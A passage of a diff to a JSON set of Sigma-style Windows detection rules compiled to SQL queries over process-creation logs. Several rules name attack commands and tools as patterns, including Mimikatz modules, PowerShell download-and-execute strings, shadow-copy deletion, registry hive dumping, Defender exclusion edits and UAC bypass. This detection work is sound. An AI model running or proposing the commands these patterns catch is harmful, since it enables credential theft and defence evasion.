Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", + "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1134.001", + "attack.t1134.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_adexplorer_execution.yml" + "filename": "proc_creation_win_hktl_sharp_impersonation.yml" }, { - "title": "PUA- IOX Tunneling Tool Execution", - "id": "d7654f02-e04b-4934-9838-65c46f187ebc", + "title": "Change Default File Association To Executable Via Assoc", + "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", "status": "experimental", - "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. 
File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.persistence", + "attack.t1546.001" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_iox.yml" + "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" }, { - "title": "Suspicious File Characteristics Due to Missing Fields", - "id": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", + "title": "Suspicious Process Start Locations", + "id": 
"15b75071-74cc-47e0-b4c6-b43744a62a2b", "status": "test", - "description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe", - "author": "Markus Neis, Sander Wiebing", + "description": "Detects suspicious process run from unusual locations", + "author": "juju4, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.006" + "attack.defense_evasion", + "attack.t1036", + "car.2013-05-002" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((Description LIKE '\\?' ESCAPE '\\' AND FileVersion LIKE '\\?' ESCAPE '\\') OR (Description LIKE '\\?' ESCAPE '\\' AND Product LIKE '\\?' ESCAPE '\\')) OR (Description LIKE '\\?' ESCAPE '\\' AND Company LIKE '\\?' ESCAPE '\\')) AND NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_file_characteristics.yml" + "filename": "proc_creation_win_rundll32_run_locations.yml" }, { - "title": "AgentExecutor PowerShell Execution", - "id": "7efd2c8d-8b18-45b7-947d-adfe9ed04f61", - 
"status": "experimental", - "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", - "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", + "title": "HTML Help HH.EXE Suspicious Child Process", + "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", + "status": "test", + "description": "Detects a suspicious child process of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ - "Legitimate use via Intune management. 
You exclude script paths and names to reduce FP rate" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_agentexecutor.yml" + "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" }, { - "title": "UtilityFunctions.ps1 Proxy Dll", - "id": "0403d67d-6227-4ea8-8145-4e72db7da120", + "title": "UAC Bypass Using IDiagnostic Profile", + "id": "4cbef972-f347-4170-b62a-8253f6168e6d", "status": "experimental", - "description": "Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.", - "author": "frack113", + "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", 
"attack.defense_evasion", - "attack.t1216" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%UtilityFunctions.ps1%' ESCAPE '\\' OR CommandLine LIKE '%RegSnapin %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_lolbin_utilityfunctions.yml" + "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "Run PowerShell Script from ADS", - "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", + "title": "Suspicious SYSTEM User Process Creation", + "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", "status": "test", - "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", - "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ], + "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", + "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", "falsepositives": [ - "Unknown" + "Administrative activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" + "SELECT * FROM 
logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR 
CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (NewProcessName LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_run_script_from_ads.yml" + "filename": "proc_creation_win_susp_system_user_anomaly.yml" }, { - "title": "Suspicious Use of CSharp Interactive Console", - "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", - "status": "test", - "description": "Detects the execution of CSharp interactive console by PowerShell", - "author": "Michael R. (@nahamike01)", + "title": "Password Protected Compressed File Extraction Via 7Zip", + "id": "b717b8fd-6467-4d7d-b3d3-27f9a463af77", + "status": "experimental", + "description": "Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1127" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." 
+ "Legitimate activity is expected since extracting files with a password can be common in some environement." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '% -p%' ESCAPE '\\' AND CommandLine LIKE '% x %' ESCAPE '\\' AND CommandLine LIKE '% -o%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csi_use_of_csharp_console.yml" + "filename": "proc_creation_win_7zip_password_extraction.yml" }, { - "title": "Whoami Utility Execution", - "id": "e28a5a99-da44-436d-b7a0-2afc20a5f413", - "status": "test", - "description": "Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "Start of NT Virtual DOS Machine", + "id": "16905e21-66ee-42fe-b256-1318ada2d770", + "status": "experimental", + "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM 
logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\ntvdm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrstub.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_whoami_execution.yml" + "filename": "proc_creation_win_susp_16bit_application.yml" }, { - "title": "Hardware Model Reconnaissance Via Wmic.EXE", - "id": "3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d", + "title": "Suspicious FromBase64String Usage On Gzip Archive - Process Creation", + "id": "d75d6b6b-adb9-48f7-824b-ac2e786efe1f", "status": "experimental", - "description": "Detects the execution of WMIC with the \"csproduct\" which is used to obtain information such as hardware models and vendor information", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1047", - "car.2016-03-002" - ], + "description": "Detects attempts of decoding a base64 Gzip archive via PowerShell. 
This technique is often used as a method to load malicious content into memory afterward.", + "author": "frack113", "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%csproduct%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%MemoryStream%' ESCAPE '\\' AND CommandLine LIKE '%H4sI%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_recon_csproduct.yml" + "filename": "proc_creation_win_powershell_frombase64string_archive.yml" }, { - "title": "PUA - Advanced IP Scanner Execution", - "id": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", - "status": "experimental", - "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", - "author": "Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy", + "title": "Execution via Diskshadow.exe", + "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", + "status": "test", + "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", + "author": "Ivan Dyachkov, oscd.community", "tags": [ - "attack.discovery", - "attack.t1046", - "attack.t1135" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Legitimate administrative use" + "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." 
], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\advanced\\_ip\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_ip\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced IP Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_advanced_ip_scanner.yml" + "filename": "proc_creation_win_lolbin_diskshadow.yml" }, { - "title": "Remote PowerShell Session Host Process (WinRM)", - "id": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", - "status": "test", - "description": "Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE", + "id": "48917adc-a28e-4f5d-b729-11e75da8941f", + "status": "experimental", + "description": "Detects the usage of \"reg.exe\" to add Defender folder exclusions. Qbot has been seen using this technique to add exlcusions for folders within AppData and ProgramData.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1021.006" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate usage of remote Powershell, e.g. for monitoring purposes." 
+ "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\Paths%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Microsoft Antimalware\\\\Exclusions\\\\Paths%' ESCAPE '\\') AND CommandLine LIKE '%ADD %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD %' ESCAPE '\\' AND CommandLine LIKE '%/v %' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrm_remote_powershell_session_process.yml" + "filename": "proc_creation_win_reg_defender_exclusion.yml" }, { - "title": "PUA - AdvancedRun Execution", - "id": "d2b749ee-4225-417e-b20e-a8d2193cbb84", + "title": "CL_Mutexverifiers.ps1 Proxy Execution", + "id": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", "status": "experimental", - "description": "Detects the execution of AdvancedRun utility", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of a Microsoft signed script to execute commands", + "author": "oscd.community, Natalia Shornikova, frack113", + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'AdvancedRun.exe' OR (CommandLine LIKE '% /EXEFilename %' ESCAPE '\\' AND CommandLine LIKE '% /Run%' ESCAPE '\\') OR (CommandLine LIKE '% /WindowState 0%' ESCAPE '\\' AND CommandLine LIKE '% /RunAs %' ESCAPE '\\' AND CommandLine LIKE '% /CommandLine %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND 
Channel = 'Security' AND CommandLine LIKE '%\\\\CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND CommandLine LIKE '%runAfterCancelProcess %' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_advancedrun.yml" + "filename": "proc_creation_win_lolbin_cl_mutexverifiers.yml" }, { - "title": "Ps.exe Renamed SysInternals Tool", - "id": "18da1007-3f26-470f-875d-f77faf1cab31", + "title": "PUA - Ngrok Execution", + "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", "status": "test", - "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", + "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.g0035", - "attack.t1036.003", - "car.2013-05-009" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Renamed SysInternals tool" + "Another tool that uses the command line switches of Ngrok", + "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine = 'ps.exe -accepteula')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (NewProcessName LIKE '%ngrok.exe' ESCAPE '\\' 
AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_ta17_293a_ps.yml" + "filename": "proc_creation_win_pua_ngrok.yml" }, { - "title": "Use of UltraViewer Remote Access Software", - "id": "88656cec-6c3b-487c-82c0-f73ebb805503", - "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", - "author": "frack113", + "title": "Suspicious Control Panel DLL Load", + "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", + "status": "test", + "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'UltraViewer' OR Company = 'DucFabulous Co,ltd' OR OriginalFileName LIKE 'UltraViewer\\_Desktop.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_software_ultraviewer.yml" + "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" }, { - "title": "Dropping Of Password Filter DLL", - "id": "b7966f4a-b333-455b-8370-8ca53c229762", - "status": "test", - "description": "Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS", - "author": "Sreeman", + "title": "Delete Important Scheduled Task", + "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", + "status": "experimental", + "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1556.002" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": 
